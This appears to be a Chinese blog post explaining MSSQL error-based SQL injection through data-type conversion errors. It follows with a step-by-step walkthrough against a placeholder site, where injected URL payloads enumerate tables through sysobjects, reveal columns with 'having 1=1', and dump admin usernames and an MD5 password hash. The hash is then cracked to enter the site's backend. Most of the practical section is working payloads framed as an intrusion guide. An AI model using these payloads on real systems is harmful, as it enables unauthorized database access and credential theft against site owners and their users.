MSSQL显错模式的手工注入实现原理思考和实战

最新推荐文章于 2024-01-03 11:11:10 发布
最新推荐文章于 2024-01-03 11:11:10 发布
阅读量895 收藏
点赞数
分类专栏: 网络安全与黑客技术 文章标签: 数据库 table access 破解 加密 class

说到Mssql手工注入,本人喜欢显错模式的,为啥呢,因为你只要构造一个语句,不用你一个一个特意的去猜,程序会自动告诉你我们要的信息,省时省力,不像不显错模式的盲注,可以让你猜上个半天。进入正题,下面来说说我对显错模式原理的思考。

    显错模式,起初也是为了方便程序员修改代码,但是,这正好被我们利用了,我们故意让程序出错来爆出我们要的敏感信息。

    上次我说到过having 1=1 和group by的显错模式是通过语法错误来达到我们的目的,这次我说的出错是数据转换出错,就是通过数据转换让数据发生溢出来完成我们的动作。

    我们应该都听说数据类型,比如int,char,等等。。。当我们定义好一个数据时,也就定义好了一个数据的长度,比如,int 型是4个字节的长度,如果一个数据超过了4个字节的长度的话,该数据就会发生溢出而失去准确性,从而编译软件会显示出错信息。

    在数据转换时有个规则,就是短的可以转换成长的,但是长的不能转换成短的,什么意思呢,就是比如数据库中有整型数据tinyint(一个字节长度)、smallint(两个字节长度)、int(四个字节长度),tinyint可以向上转化成smallint、int而不会出错,但是不能反向转化把int转化为smallint和tinyint,否则会发生数据溢出。为啥呢,这个应该很容易理解,一个数据本来是4个字节长度的,转换成2个字节长度的数据类型的话,这个2个字节的空间就装不下了,数据就丢失了,同理,反过来就可以了,2个字节的数据可以换到4个字节的空间里,数据是不会丢失出错的。

我在使用这个方法时用到下面两个函数

数据转换函数

convert(数据类型,表达式(就是要转换的对象))

cast(表达式 as 数据类型)


在注入时我们要用到的语句:

因为光是用group by 和having 不能完成我们的检测过程,所以我们要配合其他系统函数的查表功能,因为上面必须要知道表名才能利用


第一种函数

select name from sysobjects where xtype='u'  通过这个来爆第一个表

select name from sysobjects where xtype='u' and name not in('爆出来的表1','爆出来的表2'...)

一直爆下去,直到找到我们所需要的表位置


第二种函数

select table_name from information_schema.tables

select table_name from information_schema.tables where table_name not in ('爆出来的表1','爆出来的表2'...)。


实战练习

目标 http://www.xxx.com/shownews.aspx?id=3

首先拿个到一个注入点,我们要判断是什么类型的数据库mssql还是access或者其他。

一、我们提交

http://www.xxx.com/shownews.aspx?id=3 and user>0

我们得到用户名是:Jxb_Ojc_Zj_Cn

二、我们提交

http://www.xxx.com/shownews.aspx?id=3 and db_name()>0

得到数据库也是:Jxb_Ojc_Zj_Cn

三、继续提交

http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 name from sysobjects where xtype=u and status>0))

根据返回的结果,应该不是我们要的表

四、接着提交(这中间省了好多步相同操作,直到发现很有可能存放用户名的表)

http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 name from sysobjects where xtype=u and status>0 and name not in ('FM_Page_Class, 'D99_Tmp', 'D99_CMD')))

哈哈,之前有人用啊D检测过。。。

五、确定了表明之后,我们来利用having 1=1 来爆出表里的列明

提交 http://www.xxx.com/shownews.aspx?id=3 select * from FM_admin having 1=1

爆出了所有的列名,哈哈,不过一般情况下是只爆出一个列,那就要用到group by了。

六、整理下我们手上的资料,我们得到了表和列,那我们就要开始爆它字段的内容了

提交http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 adminname from fm_admin))

爆出了用户名:admin

接着提交http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 password from fm_admin))

爆出了密码:BD2C2**********BF2F4284BFDA1

当然,还有其他密码,我们可以加一个限制条件来爆出其他用户名和密码,

分别提交: http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 adminname from fm_admin where username not in (admin)))

http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 password from fm_admin where adminname not in (admin)))

当然,这个where的限制条件可以自己变通下加,这个就看大家怎么想了,哈。

接下来其他的用户名和密码我就不爆了,还有很多个用户名和密码,方法同上,重复操作。

七、拿用户名和密码进后台

拿着爆出来的md5加密的密码去破解下,运气好,第一个密码就解了

然后就是拿密码进后台了 

cnstartech
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL原理和优化实战
02-03
MySQL原理和优化实战
SQL注入方法-报错注入
acepanhuan的博客
02-11 994
SQL注入方法-报错注入
SQL注入漏洞-Mssql报错注入
HacHunter的博客
03-07 2092
MssqlSql Sever,SQL Server 是Microsoft 公司推出的关系型数据库管理系统,Sql Sever通常与IIS服务器搭配使用。 在mssql注入过程中,经常用到一些mssql中的系统函数,这些系统函数有助于帮助获取目标站点的信息: User;user_name();system_user用户 db_name():当前数据库的名字 host_name():主机名字 @@version:数据库版本 @@servername:服务器名称 @@language:当前所使用语
网络安全进阶学习第十四课——MSSQL注入
p36273的博客
08-07 2022
and 1=convert(int,(select quotename(name) from 数据库名.dbo.sysobjects where xtype=‘U’ FOR XML PATH(‘’))) –主要字段有:name(表名)、id(表 ID)、xtype(创建的对象)。and 1=(select top 1 * from 指定数据库.dbo.指定表名 where排除条件 FOR XML PATH(‘’))–举例:replace(‘1-a 2-b’,’-’, ’:’),返回结果是:1:a 2:b。
SQL注入漏洞(MSSQL注入
errorr0
07-05 2392
MSSQL注入的入门讲解
SQL错(union)注入基础深度剖析(原理
m0_46304840的博客
03-03 2317
前言 前面基础应该写的差不多了,至于关于编程语言我会后面再写 正文 什么是sql注入sql注入 指 web应用程序没有对用户输入的数据进行判断,导致前端传入后端的参数 可以被攻击者所控制,并且带入数据库执行 $sql = "SELECT * FROM users where id = $GET['id']"; 因为这里的参数,id可以可以控制,所以会被攻击者进行拼接...
深入学习MySQL事务:ACID特性的实现原理
02-24
本文将首先介绍MySQL事务相关的基础概念,然后介绍事务的ACID特性,并分析其实现原理。MySQL博大精深,文章疏漏之处在所难免,欢迎批评指正。事务(Transaction)是访问和更新数据库的程序执行单元;事务中可能包含...
PHP、mysql手工注入
10-12
- 视频教程《php+mysql(手注).wmv》可能包含关于如何识别和实施手工注入的演示,同时也可学习如何防御这类攻击。 总之,PHP与MySQL手工注入是开发者必须重视的安全问题。理解和掌握防止SQL注入的方法,以及定期对...
linux运维学习笔记:MySQL主从复制原理实战.pdf
08-18
linux运维学习笔记:MySQL主从复制原理实战
MySQL闪回原理实战
01-19
本文将介绍闪回原理,给出笔者的实战经验,并对现存的闪回工具作比较。  开胃菜  某天,小明因种种原因,误删了大批线上用户表的数据。他急忙找到公司DBA请求帮助,“客服电话已被打爆,大量用户投诉无法登陆,
mssql注入过程详解
09-11
mssql注入过程详解,从手工注入到具体实现的过程 很适合初学者
msSQL注入通杀 只要有注入点就有系统权限.rar
07-09
msSQL注入通杀,只要有注入点就有系统权限
SQL注入基础-易错问题汇总
weixin_30606461的博客
08-02 610
SQL注入基础-易错问题汇总 1.sql注入本质是什么 把用户输入当做代码执行 2.sql注入的条件 用户可控输入和原本程序要执行代码,拼接用户输入且当作SQL语句去执行 3.order by的作用及含义 order by 用于判断示位,order by 原有的作用是对字段进行一个排序,在sql注入中用order by 来判断排序,order by 1就是对一个字段...
Mssql报错注入
ChuMeng1999的博客
10-29 1320
报错信息为Y,说明is_srvrolemember(‘sysadmin’)的值为1,可以断定当前的数据库用户属于管理员组。通过该实验可以让用户掌握常见的mssql报错原理,数据类型转换错误,group by having的报错,掌握mssql中常见的几个系统函数。2.把参数id后面的1替换为@@version,参数ID为整型数据,因为字符串型的数据无法转换成整数型的数据,所以出现了报错现象。@@version表示获取数据库的版本,因为不同版本的数据有略微的差别,所以获取数据的版本信息还是很重要的。
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5247
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
SQL注入(Access、Mssql)
最新发布
jxy158212的博客
01-03 1178
之前的文章,已经详细介绍了sql注入原理,和常见sql注入方式,并以MySql数据库进行了简单的示例。接下来,我们将以Access和Mssql数据库为例进行讲解。
mssql报错注入原理及流程实例
buffedon的博客
05-19 990
mssql报错注入原理及流程实例mssql 报错注入1. 原理2. mssql 测试实例2.1 找注入点2.2 判断类型2.3 获取信息获取数据库的数量获取数据库名获取表名获取列名获取列中的值 mssql 报错注入 1. 原理 在MSSQL中,数据类型不一样(例如1=‘1’)会报错,并且报错信息会在日志信息中示出来;日志文件直接在网页上示 利用此原理,进行构造 1=‘mssql语句’,返回报错信息 2. mssql 测试实例 2.1 找注入sql注入漏洞一般都在输入框,搜索框,域名地址
06、注入篇--注入【数字型】
WX公众号-小白学安全
04-05 492
文章目录概述利用防范靶场 概述 利用 防范 靶场
Sql注入学习笔记——MySQL注入
qq_44720214的博客
07-26 1223
注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值